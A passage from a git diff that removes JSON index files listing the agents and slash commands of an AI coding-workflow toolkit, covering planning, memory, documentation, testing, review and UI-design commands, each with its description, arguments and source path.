"source": "../../../agents/cli-execution-agent.md"
|
||||
},
|
||||
{
|
||||
"name": "cli-explore-agent",
|
||||
"description": "|",
|
||||
"source": "../../../agents/cli-explore-agent.md"
|
||||
},
|
||||
{
|
||||
"name": "cli-lite-planning-agent",
|
||||
"description": "|",
|
||||
"source": "../../../agents/cli-lite-planning-agent.md"
|
||||
},
|
||||
{
|
||||
"name": "cli-planning-agent",
|
||||
"description": "|",
|
||||
"source": "../../../agents/cli-planning-agent.md"
|
||||
},
|
||||
{
|
||||
"name": "code-developer",
|
||||
"description": "|",
|
||||
"source": "../../../agents/code-developer.md"
|
||||
},
|
||||
{
|
||||
"name": "conceptual-planning-agent",
|
||||
"description": "|",
|
||||
"source": "../../../agents/conceptual-planning-agent.md"
|
||||
},
|
||||
{
|
||||
"name": "context-search-agent",
|
||||
"description": "|",
|
||||
"source": "../../../agents/context-search-agent.md"
|
||||
},
|
||||
{
|
||||
"name": "doc-generator",
|
||||
"description": "|",
|
||||
"source": "../../../agents/doc-generator.md"
|
||||
},
|
||||
{
|
||||
"name": "issue-plan-agent",
|
||||
"description": "|",
|
||||
"source": "../../../agents/issue-plan-agent.md"
|
||||
},
|
||||
{
|
||||
"name": "issue-queue-agent",
|
||||
"description": "|",
|
||||
"source": "../../../agents/issue-queue-agent.md"
|
||||
},
|
||||
{
|
||||
"name": "memory-bridge",
|
||||
"description": "Execute complex project documentation updates using script coordination",
|
||||
"source": "../../../agents/memory-bridge.md"
|
||||
},
|
||||
{
|
||||
"name": "test-context-search-agent",
|
||||
"description": "|",
|
||||
"source": "../../../agents/test-context-search-agent.md"
|
||||
},
|
||||
{
|
||||
"name": "test-fix-agent",
|
||||
"description": "|",
|
||||
"source": "../../../agents/test-fix-agent.md"
|
||||
},
|
||||
{
|
||||
"name": "ui-design-agent",
|
||||
"description": "|",
|
||||
"source": "../../../agents/ui-design-agent.md"
|
||||
},
|
||||
{
|
||||
"name": "universal-executor",
|
||||
"description": "|",
|
||||
"source": "../../../agents/universal-executor.md"
|
||||
}
|
||||
]
|
||||
@@ -1,882 +0,0 @@
|
||||
[
|
||||
{
|
||||
"name": "cli-init",
|
||||
"command": "/cli:cli-init",
|
||||
"description": "Generate .gemini/ and .qwen/ config directories with settings.json and ignore files based on workspace technology detection",
|
||||
"arguments": "[--tool gemini|qwen|all] [--output path] [--preview]",
|
||||
"category": "cli",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/cli/cli-init.md"
|
||||
},
|
||||
{
|
||||
"name": "enhance-prompt",
|
||||
"command": "/enhance-prompt",
|
||||
"description": "Enhanced prompt transformation using session memory and intent analysis with --enhance flag detection",
|
||||
"arguments": "user input to enhance",
|
||||
"category": "general",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/enhance-prompt.md"
|
||||
},
|
||||
{
|
||||
"name": "issue:discover",
|
||||
"command": "/issue:discover",
|
||||
"description": "Discover potential issues from multiple perspectives (bug, UX, test, quality, security, performance, maintainability, best-practices) using CLI explore. Supports Exa external research for security and best-practices perspectives.",
|
||||
"arguments": "<path-pattern> [--perspectives=bug,ux,...] [--external]",
|
||||
"category": "issue",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/issue/discover.md"
|
||||
},
|
||||
{
|
||||
"name": "execute",
|
||||
"command": "/issue:execute",
|
||||
"description": "Execute queue with codex using DAG-based parallel orchestration (solution-level)",
|
||||
"arguments": "[--worktree] [--queue <queue-id>]",
|
||||
"category": "issue",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "implementation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/issue/execute.md"
|
||||
},
|
||||
{
|
||||
"name": "new",
|
||||
"command": "/issue:new",
|
||||
"description": "Create structured issue from GitHub URL or text description",
|
||||
"arguments": "<github-url | text-description> [--priority 1-5]",
|
||||
"category": "issue",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/issue/new.md"
|
||||
},
|
||||
{
|
||||
"name": "plan",
|
||||
"command": "/issue:plan",
|
||||
"description": "Batch plan issue resolution using issue-plan-agent (explore + plan closed-loop)",
|
||||
"arguments": "--all-pending <issue-id>[,<issue-id>,...] [--batch-size 3] ",
|
||||
"category": "issue",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "planning",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/issue/plan.md"
|
||||
},
|
||||
{
|
||||
"name": "queue",
|
||||
"command": "/issue:queue",
|
||||
"description": "Form execution queue from bound solutions using issue-queue-agent (solution-level)",
|
||||
"arguments": "[--rebuild] [--issue <id>]",
|
||||
"category": "issue",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/issue/queue.md"
|
||||
},
|
||||
{
|
||||
"name": "code-map-memory",
|
||||
"command": "/memory:code-map-memory",
|
||||
"description": "3-phase orchestrator: parse feature keyword → cli-explore-agent analyzes (Deep Scan dual-source) → orchestrator generates Mermaid docs + SKILL package (skips phase 2 if exists)",
|
||||
"arguments": "\\\"feature-keyword\\\" [--regenerate] [--tool <gemini|qwen>]",
|
||||
"category": "memory",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "documentation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/code-map-memory.md"
|
||||
},
|
||||
{
|
||||
"name": "compact",
|
||||
"command": "/memory:compact",
|
||||
"description": "Compact current session memory into structured text for session recovery, extracting objective/plan/files/decisions/constraints/state, and save via MCP core_memory tool",
|
||||
"arguments": "[optional: session description]",
|
||||
"category": "memory",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/compact.md"
|
||||
},
|
||||
{
|
||||
"name": "docs-full-cli",
|
||||
"command": "/memory:docs-full-cli",
|
||||
"description": "Generate full project documentation using CLI execution (Layer 3→1) with batched agents (4 modules/agent) and gemini→qwen→codex fallback, <20 modules uses direct parallel",
|
||||
"arguments": "[path] [--tool <gemini|qwen|codex>]",
|
||||
"category": "memory",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "documentation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/docs-full-cli.md"
|
||||
},
|
||||
{
|
||||
"name": "docs-related-cli",
|
||||
"command": "/memory:docs-related-cli",
|
||||
"description": "Generate/update documentation for git-changed modules using CLI execution with batched agents (4 modules/agent) and gemini→qwen→codex fallback, <15 modules uses direct parallel",
|
||||
"arguments": "[--tool <gemini|qwen|codex>]",
|
||||
"category": "memory",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "documentation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/docs-related-cli.md"
|
||||
},
|
||||
{
|
||||
"name": "docs",
|
||||
"command": "/memory:docs",
|
||||
"description": "Plan documentation workflow with dynamic grouping (≤10 docs/task), generates IMPL tasks for parallel module trees, README, ARCHITECTURE, and HTTP API docs",
|
||||
"arguments": "[path] [--tool <gemini|qwen|codex>] [--mode <full|partial>] [--cli-execute]",
|
||||
"category": "memory",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "documentation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/docs.md"
|
||||
},
|
||||
  { "name": "load-skill-memory", "command": "/memory:load-skill-memory", "description": "Activate SKILL package (auto-detect from paths/keywords or manual) and intelligently load documentation based on task intent keywords", "arguments": "[skill_name] \"task intent description\"", "category": "memory", "subcategory": null, "usage_scenario": "documentation", "difficulty": "Intermediate", "source": "../../../commands/memory/load-skill-memory.md" },
  { "name": "load", "command": "/memory:load", "description": "Delegate to universal-executor agent to analyze project via Gemini/Qwen CLI and return JSON core content package for task context", "arguments": "[--tool gemini|qwen] \"task context description\"", "category": "memory", "subcategory": null, "usage_scenario": "general", "difficulty": "Intermediate", "source": "../../../commands/memory/load.md" },
  { "name": "skill-memory", "command": "/memory:skill-memory", "description": "4-phase autonomous orchestrator: check docs → /memory:docs planning → /workflow:execute → generate SKILL.md with progressive loading index (skips phases 2-3 if docs exist)", "arguments": "[path] [--tool <gemini|qwen|codex>] [--regenerate] [--mode <full|partial>] [--cli-execute]", "category": "memory", "subcategory": null, "usage_scenario": "documentation", "difficulty": "Intermediate", "source": "../../../commands/memory/skill-memory.md" },
  { "name": "style-skill-memory", "command": "/memory:style-skill-memory", "description": "Generate SKILL memory package from style reference for easy loading and consistent design system usage", "arguments": "[package-name] [--regenerate]", "category": "memory", "subcategory": null, "usage_scenario": "documentation", "difficulty": "Intermediate", "source": "../../../commands/memory/style-skill-memory.md" },
  { "name": "swagger-docs", "command": "/memory:swagger-docs", "description": "Generate complete Swagger/OpenAPI documentation following RESTful standards with global security, API details, error codes, and validation tests", "arguments": "[path] [--tool <gemini|qwen|codex>] [--format <yaml|json>] [--version <v3.0|v3.1>] [--lang <zh|en>]", "category": "memory", "subcategory": null, "usage_scenario": "documentation", "difficulty": "Intermediate", "source": "../../../commands/memory/swagger-docs.md" },
  { "name": "tech-research-rules", "command": "/memory:tech-research-rules", "description": "3-phase orchestrator: extract tech stack → Exa research → generate path-conditional rules (auto-loaded by Claude Code)", "arguments": "[session-id | tech-stack-name] [--regenerate] [--tool <gemini|qwen>]", "category": "memory", "subcategory": null, "usage_scenario": "general", "difficulty": "Intermediate", "source": "../../../commands/memory/tech-research-rules.md" },
  { "name": "update-full", "command": "/memory:update-full", "description": "Update all CLAUDE.md files using layer-based execution (Layer 3→1) with batched agents (4 modules/agent) and gemini→qwen→codex fallback, <20 modules uses direct parallel", "arguments": "[--tool gemini|qwen|codex] [--path <directory>]", "category": "memory", "subcategory": null, "usage_scenario": "general", "difficulty": "Intermediate", "source": "../../../commands/memory/update-full.md" },
  { "name": "update-related", "command": "/memory:update-related", "description": "Update CLAUDE.md for git-changed modules using batched agent execution (4 modules/agent) with gemini→qwen→codex fallback, <15 modules uses direct execution", "arguments": "[--tool gemini|qwen|codex]", "category": "memory", "subcategory": null, "usage_scenario": "general", "difficulty": "Intermediate", "source": "../../../commands/memory/update-related.md" },
  { "name": "workflow-skill-memory", "command": "/memory:workflow-skill-memory", "description": "Process WFS-* archived sessions using universal-executor agents with Gemini analysis to generate workflow-progress SKILL package (sessions-timeline, lessons, conflicts)", "arguments": "session <session-id> | all", "category": "memory", "subcategory": null, "usage_scenario": "documentation", "difficulty": "Intermediate", "source": "../../../commands/memory/workflow-skill-memory.md" },
  { "name": "breakdown", "command": "/task:breakdown", "description": "Decompose complex task into subtasks with dependency mapping, creates child task JSONs with parent references and execution order", "arguments": "task-id", "category": "task", "subcategory": null, "usage_scenario": "planning", "difficulty": "Intermediate", "source": "../../../commands/task/breakdown.md" },
  { "name": "create", "command": "/task:create", "description": "Generate task JSON from natural language description with automatic file pattern detection, scope inference, and dependency analysis", "arguments": "\"task title\"", "category": "task", "subcategory": null, "usage_scenario": "implementation", "difficulty": "Intermediate", "source": "../../../commands/task/create.md" },
  { "name": "execute", "command": "/task:execute", "description": "Execute task JSON using appropriate agent (@doc-generator/@implementation-agent/@test-agent) with pre-analysis context loading and status tracking", "arguments": "task-id", "category": "task", "subcategory": null, "usage_scenario": "implementation", "difficulty": "Intermediate", "source": "../../../commands/task/execute.md" },
  { "name": "replan", "command": "/task:replan", "description": "Update task JSON with new requirements or batch-update multiple tasks from verification report, tracks changes in task-changes.json", "arguments": "task-id [\"text\"|file.md] | --batch [verification-report.md]", "category": "task", "subcategory": null, "usage_scenario": "planning", "difficulty": "Intermediate", "source": "../../../commands/task/replan.md" },
  { "name": "version", "command": "/version", "description": "Display Claude Code version information and check for updates", "arguments": "", "category": "general", "subcategory": null, "usage_scenario": "general", "difficulty": "Beginner", "source": "../../../commands/version.md" },
  { "name": "action-plan-verify", "command": "/workflow:action-plan-verify", "description": "Perform non-destructive cross-artifact consistency analysis between IMPL_PLAN.md and task JSONs with quality gate validation", "arguments": "[optional: --session session-id]", "category": "workflow", "subcategory": null, "usage_scenario": "planning", "difficulty": "Intermediate", "source": "../../../commands/workflow/action-plan-verify.md" },
  { "name": "api-designer", "command": "/workflow:brainstorm:api-designer", "description": "Generate or update api-designer/analysis.md addressing guidance-specification discussion points for API design perspective", "arguments": "optional topic - uses existing framework if available", "category": "workflow", "subcategory": "brainstorm", "usage_scenario": "planning", "difficulty": "Intermediate", "source": "../../../commands/workflow/brainstorm/api-designer.md" },
  { "name": "artifacts", "command": "/workflow:brainstorm:artifacts", "description": "Interactive clarification generating confirmed guidance specification through role-based analysis and synthesis", "arguments": "topic or challenge description [--count N]", "category": "workflow", "subcategory": "brainstorm", "usage_scenario": "general", "difficulty": "Intermediate", "source": "../../../commands/workflow/brainstorm/artifacts.md" },
  { "name": "auto-parallel", "command": "/workflow:brainstorm:auto-parallel", "description": "Parallel brainstorming automation with dynamic role selection and concurrent execution across multiple perspectives", "arguments": "topic or challenge description\" [--count N]", "category": "workflow", "subcategory": "brainstorm", "usage_scenario": "general", "difficulty": "Advanced", "source": "../../../commands/workflow/brainstorm/auto-parallel.md" },
  { "name": "data-architect", "command": "/workflow:brainstorm:data-architect", "description": "Generate or update data-architect/analysis.md addressing guidance-specification discussion points for data architecture perspective", "arguments": "optional topic - uses existing framework if available", "category": "workflow", "subcategory": "brainstorm", "usage_scenario": "general", "difficulty": "Intermediate", "source": "../../../commands/workflow/brainstorm/data-architect.md" },
  { "name": "product-manager", "command": "/workflow:brainstorm:product-manager", "description": "Generate or update product-manager/analysis.md addressing guidance-specification discussion points for product management perspective", "arguments": "optional topic - uses existing framework if available", "category": "workflow", "subcategory": "brainstorm", "usage_scenario": "general", "difficulty": "Intermediate", "source": "../../../commands/workflow/brainstorm/product-manager.md" },
  { "name": "product-owner", "command": "/workflow:brainstorm:product-owner", "description": "Generate or update product-owner/analysis.md addressing guidance-specification discussion points for product ownership perspective", "arguments": "optional topic - uses existing framework if available", "category": "workflow", "subcategory": "brainstorm", "usage_scenario": "general", "difficulty": "Intermediate", "source": "../../../commands/workflow/brainstorm/product-owner.md" },
  { "name": "scrum-master", "command": "/workflow:brainstorm:scrum-master", "description": "Generate or update scrum-master/analysis.md addressing guidance-specification discussion points for Agile process perspective", "arguments": "optional topic - uses existing framework if available", "category": "workflow", "subcategory": "brainstorm", "usage_scenario": "general", "difficulty": "Intermediate", "source": "../../../commands/workflow/brainstorm/scrum-master.md" },
  { "name": "subject-matter-expert", "command": "/workflow:brainstorm:subject-matter-expert", "description": "Generate or update subject-matter-expert/analysis.md addressing guidance-specification discussion points for domain expertise perspective", "arguments": "optional topic - uses existing framework if available", "category": "workflow", "subcategory": "brainstorm", "usage_scenario": "general", "difficulty": "Intermediate", "source": "../../../commands/workflow/brainstorm/subject-matter-expert.md" },
  { "name": "synthesis", "command": "/workflow:brainstorm:synthesis", "description": "Clarify and refine role analyses through intelligent Q&A and targeted updates with synthesis agent", "arguments": "[optional: --session session-id]", "category": "workflow", "subcategory": "brainstorm", "usage_scenario": "general", "difficulty": "Advanced", "source": "../../../commands/workflow/brainstorm/synthesis.md" },
  { "name": "system-architect", "command": "/workflow:brainstorm:system-architect", "description": "Generate or update system-architect/analysis.md addressing guidance-specification discussion points for system architecture perspective", "arguments": "optional topic - uses existing framework if available", "category": "workflow", "subcategory": "brainstorm", "usage_scenario": "general", "difficulty": "Intermediate", "source": "../../../commands/workflow/brainstorm/system-architect.md" },
  { "name": "ui-designer", "command": "/workflow:brainstorm:ui-designer", "description": "Generate or update ui-designer/analysis.md addressing guidance-specification discussion points for UI design perspective", "arguments": "optional topic - uses existing framework if available", "category": "workflow", "subcategory": "brainstorm", "usage_scenario": "planning", "difficulty": "Intermediate", "source": "../../../commands/workflow/brainstorm/ui-designer.md" },
  { "name": "ux-expert", "command": "/workflow:brainstorm:ux-expert", "description": "Generate or update ux-expert/analysis.md addressing guidance-specification discussion points for UX perspective", "arguments": "optional topic - uses existing framework if available", "category": "workflow", "subcategory": "brainstorm", "usage_scenario": "general", "difficulty": "Intermediate", "source": "../../../commands/workflow/brainstorm/ux-expert.md" },
  { "name": "clean", "command": "/workflow:clean", "description": "Intelligent code cleanup with mainline detection, stale artifact discovery, and safe execution", "arguments": "[--dry-run] [\"focus area\"]", "category": "workflow", "subcategory": null, "usage_scenario": "general", "difficulty": "Intermediate", "source": "../../../commands/workflow/clean.md" },
  { "name": "debug", "command": "/workflow:debug", "description": "Interactive hypothesis-driven debugging with NDJSON logging, iterative until resolved", "arguments": "\"bug description or error message\"", "category": "workflow", "subcategory": null, "usage_scenario": "general", "difficulty": "Intermediate", "source": "../../../commands/workflow/debug.md" },
  { "name": "execute", "command": "/workflow:execute", "description": "Coordinate agent execution for workflow tasks with automatic session discovery, parallel task processing, and status tracking", "arguments": "[--resume-session=\"session-id\"]", "category": "workflow", "subcategory": null, "usage_scenario": "implementation", "difficulty": "Intermediate", "source": "../../../commands/workflow/execute.md" },
  { "name": "init", "command": "/workflow:init", "description": "Initialize project-level state with intelligent project analysis using cli-explore-agent", "arguments": "[--regenerate]", "category": "workflow", "subcategory": null, "usage_scenario": "general", "difficulty": "Intermediate", "source": "../../../commands/workflow/init.md" },
  { "name": "lite-execute", "command": "/workflow:lite-execute", "description": "Execute tasks based on in-memory plan, prompt description, or file content", "arguments": "[--in-memory] [\"task description\"|file-path]", "category": "workflow", "subcategory": null, "usage_scenario": "implementation", "difficulty": "Intermediate", "source": "../../../commands/workflow/lite-execute.md" },
  { "name": "lite-fix", "command": "/workflow:lite-fix", "description": "Lightweight bug diagnosis and fix workflow with intelligent severity assessment and optional hotfix mode for production incidents", "arguments": "[--hotfix] \"bug description or issue reference\"", "category": "workflow", "subcategory": null, "usage_scenario": "general", "difficulty": "Intermediate", "source": "../../../commands/workflow/lite-fix.md" },
  { "name": "lite-plan", "command": "/workflow:lite-plan", "description": "Lightweight interactive planning workflow with in-memory planning, code exploration, and execution dispatch to lite-execute after user confirmation", "arguments": "[-e|--explore] \"task description\"|file.md", "category": "workflow", "subcategory": null, "usage_scenario": "planning", "difficulty": "Intermediate", "source": "../../../commands/workflow/lite-plan.md" },
  { "name": "plan", "command": "/workflow:plan", "description": "5-phase planning workflow with action-planning-agent task generation, outputs IMPL_PLAN.md and task JSONs", "arguments": "\"text description\"|file.md", "category": "workflow", "subcategory": null, "usage_scenario": "planning", "difficulty": "Intermediate", "source": "../../../commands/workflow/plan.md" },
  { "name": "replan", "command": "/workflow:replan", "description": "Interactive workflow replanning with session-level artifact updates and boundary clarification through guided questioning", "arguments": "[--session session-id] [task-id] \"requirements\"|file.md [--interactive]", "category": "workflow", "subcategory": null, "usage_scenario": "planning", "difficulty": "Intermediate", "source": "../../../commands/workflow/replan.md" },
  { "name": "review-fix", "command": "/workflow:review-fix", "description": "Automated fixing of code review findings with AI-powered planning and coordinated execution. Uses intelligent grouping, multi-stage timeline coordination, and test-driven verification.", "arguments": "<export-file|review-dir> [--resume] [--max-iterations=N]", "category": "workflow", "subcategory": null, "usage_scenario": "analysis", "difficulty": "Intermediate", "source": "../../../commands/workflow/review-fix.md" },
  { "name": "review-module-cycle", "command": "/workflow:review-module-cycle", "description": "Independent multi-dimensional code review for specified modules/files. Analyzes specific code paths across 7 dimensions with hybrid parallel-iterative execution, independent of workflow sessions.", "arguments": "<path-pattern> [--dimensions=security,architecture,...] [--max-iterations=N]", "category": "workflow", "subcategory": null, "usage_scenario": "analysis", "difficulty": "Intermediate", "source": "../../../commands/workflow/review-module-cycle.md" },
  { "name": "review-session-cycle", "command": "/workflow:review-session-cycle", "description": "Session-based comprehensive multi-dimensional code review. Analyzes git changes from workflow session across 7 dimensions with hybrid parallel-iterative execution, aggregates findings, and performs focused deep-dives on critical issues until quality gates met.", "arguments": "[session-id] [--dimensions=security,architecture,...] [--max-iterations=N]", "category": "workflow", "subcategory": null, "usage_scenario": "session-management", "difficulty": "Intermediate", "source": "../../../commands/workflow/review-session-cycle.md" },
  { "name": "review", "command": "/workflow:review", "description": "Post-implementation review with specialized types (security/architecture/action-items/quality) using analysis agents and Gemini", "arguments": "[--type=security|architecture|action-items|quality] [--archived] [optional: session-id]", "category": "workflow", "subcategory": null, "usage_scenario": "analysis", "difficulty": "Intermediate", "source": "../../../commands/workflow/review.md" },
  { "name": "complete", "command": "/workflow:session:complete", "description": "Mark active workflow session as complete, archive with lessons learned, update manifest, remove active flag", "arguments": "", "category": "workflow", "subcategory": "session", "usage_scenario": "session-management", "difficulty": "Intermediate", "source": "../../../commands/workflow/session/complete.md" },
  { "name": "list", "command": "/workflow:session:list", "description": "List all workflow sessions with status filtering, shows session metadata and progress information", "arguments": "", "category": "workflow", "subcategory": "session", "usage_scenario": "general", "difficulty": "Beginner", "source": "../../../commands/workflow/session/list.md" },
  { "name": "resume", "command": "/workflow:session:resume", "description": "Resume the most recently paused workflow session with automatic session discovery and status update", "arguments": "", "category": "workflow", "subcategory": "session", "usage_scenario": "session-management", "difficulty": "Intermediate", "source": "../../../commands/workflow/session/resume.md" },
  { "name": "solidify", "command": "/workflow:session:solidify", "description": "Crystallize session learnings and user-defined constraints into permanent project guidelines", "arguments": "[--type <convention|constraint|learning>] [--category <category>] \"rule or insight\"", "category": "workflow", "subcategory": "session", "usage_scenario": "general", "difficulty": "Intermediate", "source": "../../../commands/workflow/session/solidify.md" },
  { "name": "start", "command": "/workflow:session:start", "description": "Discover existing sessions or start new workflow session with intelligent session management and conflict detection", "arguments": "[--type <workflow|review|tdd|test|docs>] [--auto|--new] [optional: task description for new session]", "category": "workflow", "subcategory": "session", "usage_scenario": "general", "difficulty": "Intermediate", "source": "../../../commands/workflow/session/start.md" },
  { "name": "tdd-plan", "command": "/workflow:tdd-plan", "description": "TDD workflow planning with Red-Green-Refactor task chain generation, test-first development structure, and cycle tracking", "arguments": "\"feature description\"|file.md", "category": "workflow", "subcategory": null, "usage_scenario": "planning", "difficulty": "Advanced", "source": "../../../commands/workflow/tdd-plan.md" },
  { "name": "tdd-verify", "command": "/workflow:tdd-verify", "description": "Verify TDD workflow compliance against Red-Green-Refactor cycles, generate quality report with coverage analysis", "arguments": "[optional: WFS-session-id]", "category": "workflow", "subcategory": null, "usage_scenario": "testing", "difficulty": "Advanced", "source": "../../../commands/workflow/tdd-verify.md" },
  { "name": "test-cycle-execute", "command": "/workflow:test-cycle-execute", "description": "Execute test-fix workflow with dynamic task generation and iterative fix cycles until test pass rate >= 95% or max iterations reached. Uses @cli-planning-agent for failure analysis and task generation.", "arguments": "[--resume-session=\"session-id\"] [--max-iterations=N]", "category": "workflow", "subcategory": null, "usage_scenario": "implementation", "difficulty": "Intermediate", "source": "../../../commands/workflow/test-cycle-execute.md" },
  { "name": "test-fix-gen", "command": "/workflow:test-fix-gen", "description": "Create test-fix workflow session from session ID, description, or file path with test strategy generation and task planning", "arguments": "(source-session-id | \"feature description\" | /path/to/file.md)", "category": "workflow", "subcategory": null, "usage_scenario": "testing", "difficulty": "Intermediate", "source": "../../../commands/workflow/test-fix-gen.md" },
  { "name": "test-gen", "command": "/workflow:test-gen", "description": "Create independent test-fix workflow session from completed implementation session, analyzes code to generate test tasks", "arguments": "source-session-id", "category": "workflow", "subcategory": null, "usage_scenario": "testing", "difficulty": "Intermediate", "source": "../../../commands/workflow/test-gen.md" },
  { "name": "conflict-resolution", "command": "/workflow:tools:conflict-resolution", "description": "Detect and resolve conflicts between plan and existing codebase using CLI-powered analysis with Gemini/Qwen", "arguments": "--session WFS-session-id --context path/to/context-package.json", "category": "workflow", "subcategory": "tools", "usage_scenario": "general", "difficulty": "Advanced", "source": "../../../commands/workflow/tools/conflict-resolution.md" },
  { "name": "gather", "command": "/workflow:tools:gather", "description": "Intelligently collect project context using context-search-agent based on task description, packages into standardized JSON", "arguments": "--session WFS-session-id \"task description\"", "category": "workflow", "subcategory": "tools", "usage_scenario": "general", "difficulty": "Intermediate", "source": "../../../commands/workflow/tools/context-gather.md" },
  { "name": "task-generate-agent", "command": "/workflow:tools:task-generate-agent", "description": "Generate implementation plan documents (IMPL_PLAN.md, task JSONs, TODO_LIST.md) using action-planning-agent - produces planning artifacts, does NOT execute code implementation", "arguments": "--session WFS-session-id", "category": "workflow", "subcategory": "tools", "usage_scenario": "implementation", "difficulty": "Advanced", "source": "../../../commands/workflow/tools/task-generate-agent.md" },
  { "name": "task-generate-tdd", "command": "/workflow:tools:task-generate-tdd", "description": "Autonomous TDD task generation using action-planning-agent with Red-Green-Refactor cycles, test-first structure, and cycle validation", "arguments": "--session WFS-session-id", "category": "workflow", "subcategory": "tools", "usage_scenario": "implementation", "difficulty": "Advanced", "source": "../../../commands/workflow/tools/task-generate-tdd.md" },
  { "name": "tdd-coverage-analysis", "command": "/workflow:tools:tdd-coverage-analysis", "description": "Analyze test coverage and TDD cycle execution with Red-Green-Refactor compliance verification", "arguments": "--session WFS-session-id", "category": "workflow", "subcategory": "tools", "usage_scenario": "testing", "difficulty": "Advanced", "source": "../../../commands/workflow/tools/tdd-coverage-analysis.md" },
  { "name": "test-concept-enhanced", "command": "/workflow:tools:test-concept-enhanced", "description": "Coordinate test analysis workflow using cli-execution-agent to generate test strategy via Gemini", "arguments": "--session WFS-test-session-id --context path/to/test-context-package.json", "category": "workflow", "subcategory": "tools", "usage_scenario": "testing", "difficulty": "Intermediate", "source": "../../../commands/workflow/tools/test-concept-enhanced.md" },
  { "name": "test-context-gather", "command": "/workflow:tools:test-context-gather", "description": "Collect test coverage context using test-context-search-agent and package into standardized test-context JSON", "arguments": "--session WFS-test-session-id", "category": "workflow", "subcategory": "tools", "usage_scenario": "testing", "difficulty": "Intermediate", "source": "../../../commands/workflow/tools/test-context-gather.md" },
  { "name": "test-task-generate", "command": "/workflow:tools:test-task-generate", "description": "Generate test planning documents (IMPL_PLAN.md, test task JSONs, TODO_LIST.md) using action-planning-agent - produces test planning artifacts, does NOT execute tests", "arguments": "--session WFS-test-session-id", "category": "workflow", "subcategory": "tools", "usage_scenario": "implementation", "difficulty": "Intermediate", "source": "../../../commands/workflow/tools/test-task-generate.md" },
  { "name": "animation-extract", "command": "/workflow:ui-design:animation-extract", "description": "Extract animation and transition patterns from prompt inference and image references for design system documentation", "arguments": "[--design-id <id>] [--session <id>] [--images \"<glob>\"] [--focus \"<types>\"] [--interactive] [--refine]", "category": "workflow", "subcategory": "ui-design", "usage_scenario": "general", "difficulty": "Intermediate", "source": "../../../commands/workflow/ui-design/animation-extract.md" },
  { "name": "workflow:ui-design:codify-style", "command": "/workflow:ui-design:codify-style", "description": "Orchestrator to extract styles from code and generate shareable reference package with preview (automatic file discovery)", "arguments": "<path> [--package-name <name>] [--output-dir <path>] [--overwrite]", "category": "workflow", "subcategory": "ui-design", "usage_scenario": "planning", "difficulty": "Intermediate", "source": "../../../commands/workflow/ui-design/codify-style.md" },
  { "name": "design-sync", "command": "/workflow:ui-design:design-sync", "description": "Synchronize finalized design system references to brainstorming artifacts, preparing them for /workflow:plan consumption", "arguments": "--session <session_id> [--selected-prototypes \"<list>\"]", "category": "workflow", "subcategory": "ui-design", "usage_scenario": "planning", "difficulty": "Intermediate", "source": "../../../commands/workflow/ui-design/design-sync.md" },
  { "name": "explore-auto", "command": "/workflow:ui-design:explore-auto", "description": "Interactive exploratory UI design workflow with style-centric batch generation, creates design variants from prompts/images with parallel execution and user selection", "arguments": "[--input \"<value>\"] [--targets \"<list>\"] [--target-type \"page|component\"] [--session <id>] [--style-variants <count>] [--layout-variants <count>]", "category": "workflow", "subcategory": "ui-design", "usage_scenario": "general", "difficulty": "Intermediate", "source": "../../../commands/workflow/ui-design/explore-auto.md" },
  { "name": "generate", "command": "/workflow:ui-design:generate", "description": "Assemble UI prototypes by combining layout templates with design tokens (default animation support), pure assembler without new content generation", "arguments": "[--design-id <id>] [--session <id>]", "category": "workflow", "subcategory": "ui-design", "usage_scenario": "implementation", "difficulty": "Intermediate", "source": "../../../commands/workflow/ui-design/generate.md" },
  { "name": "imitate-auto", "command": "/workflow:ui-design:imitate-auto", "description": "UI design workflow with direct code/image input for design token extraction and prototype generation", "arguments": "[--input \"<value>\"] [--session <id>]", "category": "workflow", "subcategory": "ui-design", "usage_scenario": "general", "difficulty": "Intermediate", "source": "../../../commands/workflow/ui-design/imitate-auto.md" },
  { "name": "workflow:ui-design:import-from-code", "command": "/workflow:ui-design:import-from-code", "description": "Import design system from code files (CSS/JS/HTML/SCSS) with automatic file discovery and parallel agent analysis", "arguments": "[--design-id <id>] [--session <id>] [--source <path>]", "category": "workflow", "subcategory": "ui-design", "usage_scenario": "planning", "difficulty": "Intermediate", "source": "../../../commands/workflow/ui-design/import-from-code.md" },
  { "name": "layout-extract", "command": "/workflow:ui-design:layout-extract", "description": "Extract structural layout information from reference images or text prompts using Claude analysis with variant generation or refinement mode", "arguments": "[--design-id <id>] [--session <id>] [--images \"<glob>\"] [--prompt \"<desc>\"] [--targets \"<list>\"] [--variants <count>] [--device-type <desktop|mobile|tablet|responsive>] [--interactive] [--refine]", "category": "workflow", "subcategory": "ui-design", "usage_scenario": "general", "difficulty": "Intermediate", "source": "../../../commands/workflow/ui-design/layout-extract.md" },
  { "name": "workflow:ui-design:reference-page-generator", "command": "/workflow:ui-design:reference-page-generator", "description": "Generate multi-component reference pages and documentation from design run extraction", "arguments": "[--design-run <path>] [--package-name <name>] [--output-dir <path>]", "category": "workflow", "subcategory": "ui-design", "usage_scenario": "planning", "difficulty": "Intermediate", "source": "../../../commands/workflow/ui-design/reference-page-generator.md" },
